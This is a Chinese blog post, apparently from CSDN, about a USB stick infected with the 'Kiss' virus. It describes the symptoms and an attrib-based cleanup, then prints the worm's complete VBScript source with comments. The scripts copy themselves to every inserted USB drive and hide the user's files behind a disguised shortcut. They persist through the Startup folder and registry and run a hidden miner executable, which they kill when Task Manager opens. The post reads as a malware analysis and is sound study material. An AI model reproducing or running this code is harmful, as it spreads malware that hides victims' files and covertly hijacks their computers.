第一次u盘中病毒。。。有点兴奋,大半夜的不睡觉,只为了解这个病毒的特征。
        U盘插入电脑以后,首先做出响应的是360,报毒,刚开始我没管360以为是误报,就把360关掉了,然后打开U盘,发现里面的文件一个也没少,但是后缀都多了exe,下意识的把.exe删掉,然后报错‘已有同名文件’,出现这种反常的情况,铁定中病毒了,弹出U盘重启电脑,发现电脑并没有受影响,结合病毒特征,去网上查了一下,和kiss病毒的特征基本吻合,真实的文件夹只不过是被隐藏了,并没有没删除,再有就是从U盘的剩余空间中可以发现文件并没有删除,那么就有恢复回来的可能。当然360做的确实不错,一键清除病毒。。。

360扫描结果:


特洛伊木马。。。

这个病毒确实不是很强劲,但是还有需要总结一下工作原理。
特征:
这种病毒会自动复制到U盘,被杀毒软件查杀的时候会把盘里所有文件夹属性改为——系统文件 隐藏。然后创建与文件夹同名的EXE文件,杀毒软件会删除这些EXE文件,造成文件被删除的假象。
解决方法: 
先对U盘进行杀毒。 然后选择工具栏中“工具”——“文件夹选项”,再“查看”选项卡中的“高级设置”中,选择“显示所有文件和文件夹”选项,单击确定。
开始——运行——输入“cmd”——回车
把当前目录转到U盘下,比如你的U盘是F盘,就输入“F:”回车
输入:“dir/a” 回车,此时显示当前U盘下所有文件和文件夹。
输入:“attrib -a -s -r -h /d /s *.* ”回车

“attrib -a -s -r -h /d /s *.* ”的作用:(修改文件系统属性,,取消存档属性,取消系统属性,取消只读属性,取消隐藏属性,显示目录下所有文件的属性,将attrib和任意命令行选项应用到目录)所有隐藏的目录就都出现了。但是并没有什么用,弹出U盘后,在插上后,还是和原来一样。

Kiss源码:

入口:

%COMSPEC% /C .\WindowsServices\movemenoreg.vbs

installer.vbs

on error resume next
DIM colEvents, objws, strComputer, objEvent, DestFolder, strFolder, Target, ws, objFile, objWMIService, DummyFolder, check, number, home, device, devicename, colProcess, vaprocess, objWinMgmt
strComputer = "."
Set ws = WScript.CreateObject("WScript.Shell")Target = "\WindowsServices"'where are we?
strPath = WScript.ScriptFullName
set objws = CreateObject("Scripting.FileSystemObject")
Set objFile = objws.GetFile(strPath)
strFolder = objws.GetParentFolderName(objFile)'Checking for USB instance
Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\cimv2")
'查询硬盘事件
Set colEvents = objWMIService.ExecNotificationQuery ("SELECT * FROM __InstanceOperationEvent WITHIN 1 WHERE " & "TargetInstance ISA 'Win32_LogicalDisk'")Set objWinMgmt = GetObject("WinMgmts:Root\Cimv2")While True'检查helper.vbs是否在执行,如果不在执行,则运行help.vbsSet colProcess = objWinMgmt.ExecQuery ("Select * From Win32_Process where name = 'wscript.exe'")call procheck(colProcess, "helper.vbs")'取出下一个事件Set objEvent = colEvents.NextEventIf objEvent.TargetInstance.DriveType = 2  ThenIf objEvent.Path_.Class = "__InstanceCreationEvent" Then'一个新的U盘插入device = objEvent.TargetInstance.DeviceIDdevicename = objEvent.TargetInstance.VolumeNameDestFolder = device & "\WindowsServices"DummyFolder = device & "\" & "_"'在U盘根目录下创建目的目录(\WindowsServices)if (not objws.folderexists(DestFolder)) thenobjws.CreateFolder DestFolder   Set objDestFolder = objws.GetFolder(DestFolder)objDestFolder.Attributes = objDestFolder.Attributes + 39end if'将四个病毒文件移动到目的目录Call moveandhide ("\helper.vbs")Call moveandhide ("\installer.vbs")Call moveandhide ("\movemenoreg.vbs")Call moveandhide ("\WindowsServices.exe")'在U盘根目录下创建打开movemenoreg.vbs文件的快捷方式if (not objws.fileexists (device & devicename & ".lnk")) thenSet link = ws.CreateShortcut(device & "\" & devicename & ".lnk")link.IconLocation = "%windir%\system32\SHELL32.dll, 7"link.TargetPath = "%COMSPEC%" link.Arguments = "/C .\WindowsServices\movemenoreg.vbs"link.windowstyle = 7link.SaveEnd If'在U盘根目录下创建名为‘-’的目录并隐藏if (not objws.folderexists(DummyFolder)) thenobjws.CreateFolder DummyFolder  Set objDestFolder = objws.GetFolder(DummyFolder)objDestFolder.Attributes = objDestFolder.Attributes + 2 + 4End Ifset check = objws.getFolder(device)'将用户文件都移动到名为‘-’的目录下Call checker(check)End IfEnd IfWendsub checker (path)set home = path.FilesFor Each file in homeSelect Case file.NameCase devicename & ".lnk"'nothingsCase Elseobjws.MoveFile path & file.Name, DummyFolder & "\"End SelectNextset home = path.SubFoldersFor Each home in homeSelect Case homeCase path & "_"'nothingsCase path & "WindowsServices"'nothingsCase path & "System Volume Information"'nothings'Case Elseobjws. MoveFolder home, DummyFolder & "\"End SelectNextend subsub moveandhide (name)if (not objws.fileexists(DestFolder & name)) thenobjws.CopyFile strFolder & name, DestFolder & "\"Set objmove = objws.GetFile(DestFolder & name)If not objmove.Attributes AND 39 then objmove.Attributes = 0objmove.Attributes = objmove.Attributes + 39end ifend if
end subsub procheck(checkme, procname)For Each objProcess In checkmevaprocess = objProcess.CommandLineif instr(vaprocess, procname) thenExit subEnd ifNext
ws.Run Chr(34) & strFolder  & "\" & procname & Chr(34)
end sub

helper.vbs

on error resume next
Dim ws, strPath, objws, objFile, strFolder, startupPath, MyScript, objWinMgmt, colProcess, vaprocess, miner, tskProcess, nkey, key
Set ws = WScript.CreateObject("WScript.Shell")nkey = "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\StartupFolder\helper.lnk"Set objWinMgmt = GetObject("WinMgmts:Root\Cimv2")strPath = WScript.ScriptFullName
set objws = CreateObject("Scripting.FileSystemObject")
Set objFile = objws.GetFile(strPath)
strFolder = objws.GetParentFolderName(objFile)
strPath = strFolder & "\"
'获得用户启动目录的路径
startupPath = ws.SpecialFolders("startup")miner = Chr(34) & strPath & "WindowsServices.exe" & Chr(34)MyScript = "helper.vbs"While True'检查注册表是否已经修改,如果没有,则修改注册表启动项key = Emptykey = ws.regread (nkey)If (not IsEmpty(key)) thenws.RegWrite nkey, 2, "REG_BINARY"   End ifIf (not objws.fileexists(startupPath & "\helper.lnk")) then'在启动目录创建helper.vbs的启动快捷方式Set link = ws.CreateShortcut(startupPath & "\helper.lnk")link.Description = "helper"link.TargetPath =chr(34) & strPath & "helper.vbs" & chr(34)link.WorkingDirectory = strPathlink.SaveEnd IfSet colProcess = objWinMgmt.ExecQuery ("Select * From Win32_Process where name = 'wscript.exe'")'检查installer.vbs文件是否在执行,如果不在则运行installer.vbscall procheck(colProcess, "installer.vbs")Set colProcess = objWinMgmt.ExecQuery ("Select * From Win32_Process where name Like '%WindowsServices.exe%'")Set tskProcess = objWinMgmt.ExecQuery ("Select * From Win32_Process where name Like '%Taskmgr.exe%'")if colProcess.count = 0 And tskProcess.count = 0  then'运行WindowsServices.exews.Run miner, 0ElseIf colProcess.count > 0 And tskProcess.count > 0 then'如果用户打开了任务管理器,则杀掉WindowsServices.exeFor Each objProcess In colProcessws.run "taskkill /PID " & objProcess.ProcessId , 0 Nextend ifWScript.Sleep 3000
Wendsub procheck(checkme, procname)For Each objProcess In checkmevaprocess = objProcess.CommandLineif instr(vaprocess, procname) thenExit subEnd ifNextws.Run Chr(34) & strPath & procname & Chr(34)end sub

movemenoreg.vbs

'发生错误时,程序继续执行下一句代码
on error resume next
'定义一系统变量
Dim  strPath, objws, objFile, strFolder, Target, destFolder, objDestFolder, AppData, ws, objmove, pfolder, objWinMgmt, colProcess, vaprocess
'获得WScript.Shell
Set ws = WScript.CreateObject("WScript.Shell")Target = "\WindowsServices"'打开根目录下名为‘-’的目录,也就是真正存放用户所有文件的目录
strPath = WScript.ScriptFullName
set objws = CreateObject("Scripting.FileSystemObject")
Set objFile = objws.GetFile(strPath)
strFolder = objws.GetParentFolderName(objFile)
pfolder = objws.GetParentFolderName(strFolder)
'Chr(34)是双引号
ws.Run Chr(34) & pfolder & "\_" & Chr(34)AppData = ws.ExpandEnvironmentStrings("%AppData%")DestFolder = AppData & Target'创建目标目录,也就是%AppData%\WindowsServices目录
if (not objws.folderexists(DestFolder)) thenobjws.CreateFolder DestFolder   Set objDestFolder = objws.GetFolder(DestFolder)
end if'将四个病毒文件复制到目标目录并隐藏,再将目标目录隐藏
Call moveandhide ("\helper.vbs")
Call moveandhide ("\installer.vbs")
Call moveandhide ("\movemenoreg.vbs")
Call moveandhide ("\WindowsServices.exe")
objDestFolder.Attributes = objDestFolder.Attributes + 39sub moveandhide (name)if (not objws.fileexists(DestFolder & name)) then'复制文件objws.CopyFile strFolder & name, DestFolder & "\"Set objmove = objws.GetFile(DestFolder & name)'隐藏文件(39表示文件属性为归档、系统、隐藏)If not objmove.Attributes AND 39 then objmove.Attributes = 0objmove.Attributes = objmove.Attributes + 39end ifend if
end subSet objWinMgmt = GetObject("WinMgmts:Root\Cimv2")
Set colProcess = objWinMgmt.ExecQuery ("Select * From Win32_Process where name = 'wscript.exe'")
'从任务管理器中查找helper.vbs是否已经运行,如果已经运行则退出当前脚本
For Each objProcess In colProcessvaprocess = objProcess.CommandLineif instr(vaprocess, "helper.vbs") thenWScript.quitEnd if
Next'运行helper.vbs
ws.Run Chr(34) & DestFolder & "\helper.vbs" & Chr(34)Set ws = Nothing

参考:https://blog.csdn.net/hzh_csdn/article/details/79427001

U盘中Kiss病毒之后相关推荐

  1. 彻底删除U盘中的病毒和隐藏文件、格式化u盘

    1.命令提示符里输入:diskpart 2.在DISKPART后输入:list disk 磁盘 1 表示的是我的U盘,一定要看好内存识别哪个才是自己的U盘 3.在DISKPART后输入:select ...

  2. w ndows7中病毒视频,Windows7解决电脑中了kiss病毒的方法

    Windows7解决电脑中了kiss病毒的方法 我们知道电脑使用久了总是会出现各种各样的问题,其中最常见的就是中毒了,不少用户就曾经遇到Windows7电脑中了kiss病毒,下面给大家介绍Window ...

  3. 计算机u盘病毒清除方式,如何操作才能将U盘中的病毒彻底?两种方法即可清除...

    可以说,U盘是最容易中毒的电脑外接设备之一,很多时候,咱们只是下载了一个软件,或者是将U盘拿到外面的打印店打印了一下文件,就很有可能发现自己的U盘中毒了.那么你确定你每次的操作都可以将U盘中的病毒彻底 ...

  4. U盘中蠕虫病毒处理方法

    步骤一:在u盘里面新建一个txt文件 步骤二:在新建的txt 文件中输入: for /f "delims=" %%i in ('dir /ah /s/b') do attrib & ...

  5. u盘文件看得见却打不开_U盘中病毒,文件看得见,但是打不开,文件要怎么修复,求解答?...

    匿名用户 1级 2018-11-25 回答 常用U盘的朋友经常会遇到过中病毒的情况,即使用杀毒软件杀毒也无法恢复.如: 一.本来存到U盘的文件夹一下子都没有了,查看U盘大小发现还占用一定的空间(原因: ...

  6. U盘中病毒,除病毒,要除根

    U盘中病毒,除病毒,要除根 U盘中病毒--反反复复 System Volume Information文件夹 如何删除System Volume Information文件夹 除病毒,要除根(方法) ...

  7. 病毒木马查杀实战第014篇:U盘病毒之手动查杀

    在U盘中发现病毒 前段时间需要往虚拟机中拷贝点资料,如同往常一样,插上我的U盘,并且在虚拟机的设置中选择连接U盘.奇怪的是这次的连接时间较以往长,并且还出现了"自动播放"窗口: 图 ...

  8. 关于u盘病毒的通用防治及查杀代码(转梦之光芒_)

    我们学校的电脑没有杀毒软件,全是木马.有的通过u盘传播甚至杀毒软件都不能查杀.所以想出此方法.对于所有u盘有效.可以防止所有通过u盘传播的病毒.本方法欢迎转载,但要声明文章出自梦之光芒!经常用u盘从别 ...

  9. U盘文件被病毒破坏的常见迹象和数据恢复方法

    "请问?我的U盘文件不见了,好像是中了病毒,我该怎么办?" 有些朋友可能遇到上面这样的问题,把U盘插入电脑的时候,发现文件不见了,打开后全是空文件夹.这其实不是数据丢失,而是U盘中 ...

最新文章

  1. 【怎样写代码】确保对象的唯一性 -- 单例模式(三):单例模式
  2. 二十二、 深入Python的进程和线程(上篇)
  3. getX(),getY()等方法的区别(图解)
  4. sed 分隔符打印_字符截取:cut,格式化输出:printf,字符截取:awk,文件或命令输出编辑:sed...
  5. SaaS 正在 Rails 化
  6. MySQL(12)-----多表查询(内连接和外连接)
  7. 今日头条导航栏动画选中+recyclerview
  8. 免费会员管理系统实现门店微信会员营销
  9. 苹果电脑双系统安装及使用心得
  10. ​​​LabVIEW视觉软件使用什么算法
  11. php机房图形资产管理系统,机房资产管理系统(CMDB)
  12. python语言基本语句-Python中的基本语句
  13. 消费商时代来临,日常消费成为投资
  14. Python sqrt()函数的使用
  15. win无法进入计算机管理,Win10系统右键“管理”无法打开的解决方法
  16. Android学习笔记十七.使用ContentProvider实现数据共享(四).操作系统(联系人)的ContentProvider
  17. 程序员如何快速入门?
  18. 【Python】输入圆的半径,根据自定义的方法返回圆的周长/面积等
  19. 60帧/秒摄像头 视频帧数最佳选择!
  20. FAT16文件系统之总结构分析(一)

热门文章

  1. Windows无法启动安装过程
  2. 深入理解js基本类型和引用类型的区别
  3. TileMill 快速入门
  4. 华为推出OpenHarmony生态使能服务 加速OpenHarmony商用发行版落地
  5. Adobe Photoshop CC 2019.0.5 for Mac 中文共享版 - 专业图片处理工具
  6. php 解决循环引用,excel循环引用如何解决
  7. 如何在AidLearning中快速开发人脸识别APP
  8. 山东春秀高考计算机本科录取率,2020年山东高考本科录取率突破50%
  9. mysql 书签查找_SQL Server 索引 之 书签查找 第十一篇
  10. python教程73--Streamlit之基于Dataframe构造大数据